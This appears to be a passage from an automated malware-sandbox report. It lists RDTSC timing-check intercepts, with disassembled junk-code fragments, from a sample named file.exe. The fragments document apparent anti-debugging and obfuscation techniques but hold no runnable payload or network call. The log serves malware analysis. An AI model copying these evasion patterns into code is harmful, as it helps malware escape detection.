          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B58B second address: A2B590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FF23 second address: A2FF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FF29 second address: A2FF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FDA3 second address: A2FDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1FDD1C1206h 0x0000000a popad 0x0000000b jmp 00007F1FDD1C120Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1FDD1C120Ah 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3639F second address: A363A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38FCB second address: A38FD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3928D second address: A392A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1FDD1C143Ch 0x0000000c push edx 0x0000000d pop edx 0x0000000e jns 00007F1FDD1C1436h 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A392A9 second address: A392B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A392B1 second address: A392B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A392B5 second address: A392C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F1FDD1C1212h 0x0000000c ja 00007F1FDD1C1206h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48337 second address: A4835C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1FDD1C1436h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F1FDD1C1445h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A5D2 second address: A4A5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C5EF second address: A4C5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C1B2 second address: A4C1B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C1B7 second address: A4C1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F1FDD1C1436h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C1CC second address: A4C1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1FDD1C120Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C1E4 second address: A4C1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59743 second address: A59747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C84F second address: A5C855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C855 second address: A5C865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F1FDD1C1206h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61BEE second address: A61BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61BF6 second address: A61BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61EB7 second address: A61EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62032 second address: A62038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62347 second address: A62361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C143Fh 0x00000009 ja 00007F1FDD1C1436h 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62361 second address: A62372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1FDD1C120Bh 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62372 second address: A623A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F1FDD1C1456h 0x00000010 jmp 00007F1FDD1C143Ah 0x00000015 jmp 00007F1FDD1C1446h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63160 second address: A63174 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F1FDD1C1223h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65BF5 second address: A65C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F1FDD1C1436h 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A780C4 second address: A780DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F1FDD1C1214h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A780DD second address: A780E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7988C second address: A798A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007F1FDD1C1215h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BD14 second address: A7BD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BD18 second address: A7BD6E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C1206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F1FDD1C1210h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push edi 0x00000016 jnc 00007F1FDD1C121Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1FDD1C1213h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BD6E second address: A7BD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A896F1 second address: A896F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8923D second address: A8926C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F1FDD1C143Eh 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1FDD1C1449h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8926C second address: A89270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A893F1 second address: A89408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3605 second address: AA3617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jns 00007F1FDD1C1206h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3D4C second address: AA3D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C1448h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3D6A second address: AA3D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jne 00007F1FDD1C1206h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edi 0x0000000f jmp 00007F1FDD1C1213h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007F1FDD1C1206h 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3D98 second address: AA3D9E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3EEC second address: AA3EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4079 second address: AA407D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA407D second address: AA4083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4083 second address: AA4089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4089 second address: AA408F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA408F second address: AA4093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA436A second address: AA4370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4370 second address: AA437A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1FDD1C1436h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8651 second address: AA8655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0759 second address: 4EB082E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1FDD1C1211h 0x00000008 add si, 6996h 0x0000000d jmp 00007F1FDD1C1211h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 pushad 0x00000018 mov dx, cx 0x0000001b pushfd 0x0000001c jmp 00007F1FDD1C1218h 0x00000021 or cl, FFFFFFE8h 0x00000024 jmp 00007F1FDD1C120Bh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d push esi 0x0000002e pushfd 0x0000002f jmp 00007F1FDD1C120Bh 0x00000034 sbb ecx, 4F4AE02Eh 0x0000003a jmp 00007F1FDD1C1219h 0x0000003f popfd 0x00000040 pop eax 0x00000041 movsx ebx, si 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 call 00007F1FDD1C1214h 0x0000004e pop esi 0x0000004f pushfd 0x00000050 jmp 00007F1FDD1C120Bh 0x00000055 sub si, 6AEEh 0x0000005a jmp 00007F1FDD1C1219h 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB082E second address: 4EB084C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov eax, ebx 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB084C second address: 4EB0852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0852 second address: 4EB0856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0856 second address: 4EB085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB089B second address: 4EB08A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB08A3 second address: 4EB08A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB08A9 second address: 4EB0042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F1FDD1C1448h 0x00000011 pushfd 0x00000012 jmp 00007F1FDD1C1442h 0x00000017 sbb esi, 6BC48BE8h 0x0000001d jmp 00007F1FDD1C143Bh 0x00000022 popfd 0x00000023 popad 0x00000024 popad 0x00000025 je 00007F204DDAF197h 0x0000002b xor eax, eax 0x0000002d jmp 00007F1FDD19AB6Ah 0x00000032 pop esi 0x00000033 pop edi 0x00000034 pop ebx 0x00000035 leave 0x00000036 retn 0004h 0x00000039 nop 0x0000003a cmp eax, 00000000h 0x0000003d setne cl 0x00000040 xor ebx, ebx 0x00000042 test cl, 00000001h 0x00000045 jne 00007F1FDD1C1437h 0x00000047 jmp 00007F1FDD1C15ABh 0x0000004c call 00007F1FE189A6D5h 0x00000051 mov edi, edi 0x00000053 jmp 00007F1FDD1C143Fh 0x00000058 xchg eax, ebp 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F1FDD1C143Bh 0x00000062 xor cl, 0000005Eh 0x00000065 jmp 00007F1FDD1C1449h 0x0000006a popfd 0x0000006b movzx ecx, dx 0x0000006e popad 0x0000006f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0042 second address: 4EB0048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0048 second address: 4EB011B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1FDD1C1441h 0x00000010 and al, 00000046h 0x00000013 jmp 00007F1FDD1C1441h 0x00000018 popfd 0x00000019 mov esi, 354A14F7h 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F1FDD1C1448h 0x00000027 xor esi, 0AACBA18h 0x0000002d jmp 00007F1FDD1C143Bh 0x00000032 popfd 0x00000033 mov bh, al 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 pushad 0x00000039 mov al, bh 0x0000003b jmp 00007F1FDD1C143Ah 0x00000040 popad 0x00000041 xchg eax, ecx 0x00000042 jmp 00007F1FDD1C1440h 0x00000047 push eax 0x00000048 jmp 00007F1FDD1C143Bh 0x0000004d xchg eax, ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushfd 0x00000052 jmp 00007F1FDD1C143Bh 0x00000057 sub cl, FFFFFFEEh 0x0000005a jmp 00007F1FDD1C1449h 0x0000005f popfd 0x00000060 call 00007F1FDD1C1440h 0x00000065 pop eax 0x00000066 popad 0x00000067 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB01A2 second address: 4EB01A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB01A8 second address: 4EB0C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a and bl, 00000001h 0x0000000d movzx eax, bl 0x00000010 lea esp, dword ptr [ebp-0Ch] 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 pop ebp 0x00000017 ret 0x00000018 add esp, 04h 0x0000001b jmp dword ptr [007EA41Ch+ebx*4] 0x00000022 push edi 0x00000023 call 00007F1FDD1E6E37h 0x00000028 push ebp 0x00000029 push ebx 0x0000002a push edi 0x0000002b push esi 0x0000002c sub esp, 000001D0h 0x00000032 mov dword ptr [esp+000001B4h], 007ECB10h 0x0000003d mov dword ptr [esp+000001B0h], 000000D0h 0x00000048 mov dword ptr [esp], 00000000h 0x0000004f mov eax, dword ptr [007E81DCh] 0x00000054 call eax 0x00000056 mov edi, edi 0x00000058 jmp 00007F1FDD1C1440h 0x0000005d xchg eax, ebp 0x0000005e pushad 0x0000005f jmp 00007F1FDD1C143Eh 0x00000064 mov dh, cl 0x00000066 popad 0x00000067 push eax 0x00000068 jmp 00007F1FDD1C143Ch 0x0000006d xchg eax, ebp 0x0000006e jmp 00007F1FDD1C1440h 0x00000073 mov ebp, esp 0x00000075 jmp 00007F1FDD1C1440h 0x0000007a cmp dword ptr [75AF459Ch], 05h 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F1FDD1C1447h 0x00000088 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0C36 second address: 4EB0C91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F204DD9EFB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007F1FDD1C1219h 0x0000001a or esi, 475F96F6h 0x00000020 jmp 00007F1FDD1C1211h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0C91 second address: 4EB0CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0CA3 second address: 4EB0CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0CA7 second address: 4EB0CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0CAD second address: 4EB0CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0CCF second address: 4EB0D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1FDD1C1447h 0x00000008 pushfd 0x00000009 jmp 00007F1FDD1C1448h 0x0000000e sbb si, 4C08h 0x00000013 jmp 00007F1FDD1C143Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push 58B99A4Fh 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F1FDD1C1445h 0x00000028 and ecx, 71EFEF26h 0x0000002e jmp 00007F1FDD1C1441h 0x00000033 popfd 0x00000034 mov di, cx 0x00000037 popad 0x00000038 add dword ptr [esp], 1CF501D9h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0D5B second address: 4EB0D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0D5F second address: 4EB0D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0D65 second address: 4EB0D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0DD8 second address: 4EB0E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 test al, al 0x00000008 jmp 00007F1FDD1C1447h 0x0000000d je 00007F204DD94FC4h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop esi 0x00000018 pushfd 0x00000019 jmp 00007F1FDD1C1447h 0x0000001e sub ch, FFFFFF8Eh 0x00000021 jmp 00007F1FDD1C1449h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED06E0 second address: 4ED06E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED06E6 second address: 4ED06EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED06EA second address: 4ED0713 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1FDD1C1215h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0713 second address: 4ED0723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C143Ch 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0723 second address: 4ED078A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1FDD1C120Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1FDD1C120Dh 0x00000016 sbb cl, FFFFFFD6h 0x00000019 jmp 00007F1FDD1C1211h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F1FDD1C120Eh 0x00000027 xchg eax, esi 0x00000028 jmp 00007F1FDD1C1210h 0x0000002d push eax 0x0000002e pushad 0x0000002f mov ecx, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 mov ax, dx 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED078A second address: 4ED079A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 mov edi, 657E1622h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
